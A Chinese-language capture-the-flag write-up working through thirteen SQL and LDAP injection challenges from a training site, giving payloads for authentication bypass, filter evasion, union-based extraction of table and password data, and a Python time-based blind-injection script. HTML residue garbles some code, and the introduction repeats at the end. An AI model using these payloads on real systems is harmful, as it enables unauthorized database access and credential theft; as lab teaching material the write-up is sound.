SQL注入实战教程：从入门到进阶<\/h1>

前言<\/h2>
本教程基于ringzer0team.com网站的SQL注入挑战题目，由浅入深地讲解各种SQL注入技术。SQL注入是一种常见的Web安全漏洞，攻击者通过构造恶意输入来操纵后端数据库查询，从而获取未授权的数据或执行未授权的操作。<\/p>

基础SQL注入<\/h2>

1. 最简单的SQL注入 (point 1)<\/h3>

题目<\/strong>：最基本的SQL注入模式<\/p>

解决方案<\/strong>：<\/p>

username: admin<\/span>'#
<\/span><\/span><\/span>password: 1
<\/span><\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

#<\/code>是MySQL的注释符号，使得后面的密码检查被注释掉<\/li>
实际执行的SQL：SELECT * FROM users WHERE username='admin'#' AND password='1'<\/code><\/li>
<\/ul>
获取的flag<\/strong>：FLAG-238974289383274893<\/code><\/p>
2. 错误回显注入 (point 2)<\/h3>
题目<\/strong>：ACL rulezzz the world<\/p>
测试过程<\/strong>：<\/p>

输入username=admin'<\/code>得到错误信息：
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4
<\/code><\/pre>
<\/li>
构造闭合：<\/li>
<\/ol>
username=<\/span>admin<\/span>' or 1#
<\/span><\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

or 1<\/code>使得条件永远为真<\/li>
#<\/code>注释掉后续条件<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-sdfoip340e89rfuj34woit<\/code><\/p>
绕过过滤技巧<\/h2>
3. 绕过注释符过滤 (point 2)<\/h3>
题目<\/strong>：Login portal 1<\/p>
过滤内容<\/strong>：#<\/code>、--<\/code>、=<\/code>被过滤<\/p>
解决方案<\/strong>：<\/p>
username=<\/span>admin<\/span>' or '<\/span>a' like '<\/span>a&<\/span>password=<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

使用like<\/code>代替=<\/code><\/li>
构造恒真条件'a' like 'a'<\/code><\/li>
<\/ul>
获取的flag<\/strong>：FLAG-4f885o1dal0q1huj6eaxuatcvn<\/code><\/p>
4. 长度截断注入 (point 2)<\/h3>
题目<\/strong>：Random Login Form<\/p>
解决方案<\/strong>：<\/p>

注册时：<\/li>
<\/ol>
username=<\/span>admin<\/span>                                    1<\/span>
<\/span><\/span>password=<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>
登录时：<\/li>
<\/ol>
username=<\/span>admin<\/span>
<\/span><\/span>password=<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

利用数据库对长用户名的截断处理<\/li>
注册时插入带空格的用户名，登录时使用短用户名匹配<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-0Kg64o8M9gPQfH45583Mc0jc3u<\/code><\/p>
高级注入技术<\/h2>
5. LDAP注入 (point 2)<\/h3>
题目<\/strong>：Just another login form<\/p>
解决方案<\/strong>：<\/p>
username =<\/span> *<\/span>
<\/span><\/span>password =<\/span> *<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

这是LDAP查询的特殊语法<\/li>
*<\/code>在LDAP中表示通配符<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-38i65201RR4B5g1oAm05fHO0QP<\/code><\/p>
6. PostgreSQL注入 (point 2)<\/h3>
题目<\/strong>：Po po po po postgresql<\/p>
解决方案<\/strong>：<\/p>
username=<\/span>admin<\/span>') or '<\/span>a' like '<\/span>a') -- &password=1
<\/span><\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

PostgreSQL语法与MySQL略有不同<\/li>
需要正确闭合括号<\/li>
--<\/code>是PostgreSQL的注释符号<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-mdeq68jNN88xLB1o2m8V33Ld<\/code><\/p>
盲注技术<\/h2>
7. 时间盲注 (point 3)<\/h3>
题目<\/strong>：Don't mess with Noemie; she hates admin!<\/p>
测试过程<\/strong>：<\/p>
username =<\/span> admin<\/span>' or sleep(5) or '<\/span>a' like '<\/span>a
<\/span><\/span><\/code><\/pre>确认sleep生效后构造：<\/p>
username =<\/span> 1<\/span>' or 1 or '<\/span>
<\/span><\/span>password =<\/span> 1<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

构造的SQL：SELECT * FROM users WHERE username='1' or 1 or '' AND password = '1'<\/code><\/li>
or 1<\/code>使得条件永远为真<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-Yk3Hfovvb5kALU9hI2545MaY<\/code><\/p>
8. NULL条件绕过 (point 3)<\/h3>
题目<\/strong>：What's the definition of NULL<\/p>
提示<\/strong>：WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)<\/code><\/p>
解决方案<\/strong>：<\/p>
0<\/span>) OR<\/span> (ID IS<\/span> NULL<\/span>) OR<\/span> (1<\/span>=<\/span>2<\/span>
<\/span><\/span><\/code><\/pre>编码为base64：<\/p>
?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=
<\/code><\/pre>
原理<\/strong>：<\/p>

构造条件绕过IS NOT NULL<\/code>检查<\/li>
最终SQL：WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)<\/code><\/li>
<\/ul>
获取的flag<\/strong>：FLAG-sQFYzqfxbZhAj04NyCCV8tqA<\/code><\/p>
联合注入实战<\/h2>
9. 联合注入获取数据 (point 3)<\/h3>
题目<\/strong>：Login portal 2<\/p>
步骤<\/strong>：<\/p>

确定回显位置：<\/li>
<\/ol>
username =<\/span> 1<\/span>' union select 1,2#
<\/span><\/span><\/span><\/code><\/pre>
获取表名：<\/li>
<\/ol>
username =<\/span> 1<\/span>' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
<\/span><\/span><\/span><\/code><\/pre>
获取列名：<\/li>
<\/ol>
username =<\/span> 1<\/span>' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='<\/span>users'),2#
<\/span><\/span><\/span><\/code><\/pre>
获取密码：<\/li>
<\/ol>
username =<\/span> impossibletoguess' union select sha1(1),sha1(1)#
<\/span><\/span><\/span>password = 1
<\/span><\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

通过联合注入逐步获取数据库结构信息<\/li>
发现密码是sha1哈希<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-wlez73yxtkae9mpr8aerqay7or<\/code><\/p>
绕过空格过滤<\/h2>
10. 使用换行符绕过空格 (point 4)<\/h3>
题目<\/strong>：Quote of the day<\/p>
解决方案<\/strong>：<\/p>
?<\/span>q=<\/span>2<\/span>%<\/span>0<\/span>aunion%<\/span>0<\/span>aselect%<\/span>0<\/span>a1,2<\/span>#<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

空格被过滤，使用%0a<\/code>（换行符）代替<\/li>
逐步获取数据：<\/li>
<\/ul>
?<\/span>q=<\/span>2<\/span>%<\/span>0<\/span>aunion%<\/span>0<\/span>aselect%<\/span>0<\/span>a1,(select<\/span>%<\/span>0<\/span>agroup_concat(TABLE_NAME<\/span>)%<\/span>0<\/span>afrom%<\/span>0<\/span>ainformation_schema.TABLES%<\/span>0<\/span>awhere%<\/span>0<\/span>aTABLE_SCHEMA=<\/span>database<\/span>())#<\/span>
<\/span><\/span><\/code><\/pre>获取的flag<\/strong>：FLAG-bB6294R6cmLUlAu6H71sTd2J<\/code><\/p>
SQLite注入技巧<\/h2>
11. SQLite特殊查询 (point 4)<\/h3>
题目<\/strong>：Thinking outside the box is the key<\/p>
步骤<\/strong>：<\/p>

获取SQLite版本：<\/li>
<\/ol>
?<\/span>id=<\/span>2<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> 1<\/span>,sqlite_version() from<\/span> sqlite_master
<\/span><\/span><\/code><\/pre>
获取表名：<\/li>
<\/ol>
?<\/span>id=<\/span>2<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> 1<\/span>,((select<\/span> name from<\/span> sqlite_master where<\/span> type<\/span>=<\/span>'table'<\/span> limit<\/span> 0<\/span>,1<\/span>)) from<\/span> sqlite_master
<\/span><\/span><\/code><\/pre>
获取flag：<\/li>
<\/ol>
?<\/span>id=<\/span>2<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> union<\/span> select<\/span> 1<\/span>,((select<\/span> flag from<\/span> ajklshfajks limit<\/span> 0<\/span>,1<\/span>)) from<\/span> sqlite_master
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

SQLite使用sqlite_master<\/code>作为系统表<\/li>
通过联合注入获取表结构和数据<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-13lIBUTHNFLEprz2KKMx6yqV<\/code><\/p>
多重编码绕过<\/h2>
12. 绕过严格过滤 (point 4)<\/h3>
题目<\/strong>：No more hacking for me!<\/p>
过滤逻辑<\/strong>：<\/p>
urldecode<\/span>(addslashes<\/span>(str_replace<\/span>("'"<\/span>, ""<\/span>, urldecode<\/span>(htmlspecialchars<\/span>($_GET['id'<\/span>], ENT_QUOTES<\/span>)))))
<\/span><\/span><\/code><\/pre>解决方案<\/strong>：<\/p>
?<\/span>id=<\/span>0<\/span>%<\/span>252527<\/span> union<\/span> all<\/span> select<\/span> 1<\/span>,tbl_name,3<\/span> FROM<\/span> sqlite_master WHERE<\/span> type<\/span>=%<\/span>252527<\/span>table<\/span>%<\/span>252527<\/span> limit<\/span> 0<\/span>,1<\/span> -- 
<\/span><\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

使用双重URL编码绕过过滤<\/li>
%252527<\/code>解码后是%27<\/code>，即单引号<\/li>
<\/ul>
获取的flag<\/strong>：FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE<\/code><\/p>
盲注脚本示例<\/h2>
13. 基于时间的盲注 (point 7)<\/h3>
题目<\/strong>：Login portal 4<\/p>
Python脚本<\/strong>：<\/p>
import<\/span> requests
<\/span><\/span>url =<\/span> "https:\/\/ringzer0team.com\/challenges\/6"<\/span>
<\/span><\/span>cookie =<\/span> {"PHPSESSID"<\/span>:"vtqgjp8amva1fsr6eolee70af4"<\/span>}
<\/span><\/span>flag =<\/span> ""<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>,1000<\/span>):
<\/span><\/span>    for<\/span> j in<\/span> range(33<\/span>,127<\/span>):
<\/span><\/span>        data =<\/span> {
<\/span><\/span>            "username"<\/span>:"1' || if((ascii(substr((select password from users limit 0,1),<\/span>%s<\/span>,1))=<\/span>%s<\/span>),sleep(3),1) || '"<\/span>%<\/span>(i,j),
<\/span><\/span>            "password"<\/span>:"1"<\/span>
<\/span><\/span>        }
<\/span><\/span>        try<\/span>:
<\/span><\/span>            r =<\/span> requests.<\/span>post(url=<\/span>url,data=<\/span>data,cookies=<\/span>cookie,timeout=<\/span>2.5<\/span>)
<\/span><\/span>        except<\/span>:
<\/span><\/span>            flag +=<\/span> chr(j)
<\/span><\/span>            print(flag)
<\/span><\/span>            break<\/span>
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

使用if(condition,sleep(3),1)<\/code>构造时间延迟<\/li>
通过响应时间判断字符是否正确<\/li>
逐步爆破出密码：UrASQLi1337!<\/code><\/li>
<\/ul>
获取的flag<\/strong>：FLAG-70ygerntbicjdzrxmm0rmk0xx2<\/code><\/p>
总结<\/h2>
本教程涵盖了从基础到高级的各种SQL注入技术，包括：<\/p>

基本注释符注入<\/li>
错误回显利用<\/li>
各种过滤绕过技巧<\/li>
不同数据库的特殊注入方法<\/li>
联合注入获取数据<\/li>
盲注技术（布尔盲注和时间盲注）<\/li>
编码绕过技术<\/li>
<\/ol>
每种技术都配有实际案例和详细解释，帮助学习者全面理解SQL注入的原理和防御方法。在实际应用中，这些技术往往需要结合使用，并根据目标环境灵活调整。<\/p>

SQL注入实战教程：从入门到进阶<\/h1>

前言<\/h2> 本教程基于ringzer0team.com网站的SQL注入挑战题目，由浅入深地讲解各种SQL注入技术。SQL注入是一种常见的Web安全漏洞，攻击者通过构造恶意输入来操纵后端数据库查询，从而获取未授权的数据或执行未授权的操作。<\/p>

基础SQL注入<\/h2>

前言<\/h2>
本教程基于ringzer0team.com网站的SQL注入挑战题目，由浅入深地讲解各种SQL注入技术。SQL注入是一种常见的Web安全漏洞，攻击者通过构造恶意输入来操纵后端数据库查询，从而获取未授权的数据或执行未授权的操作。<\/p>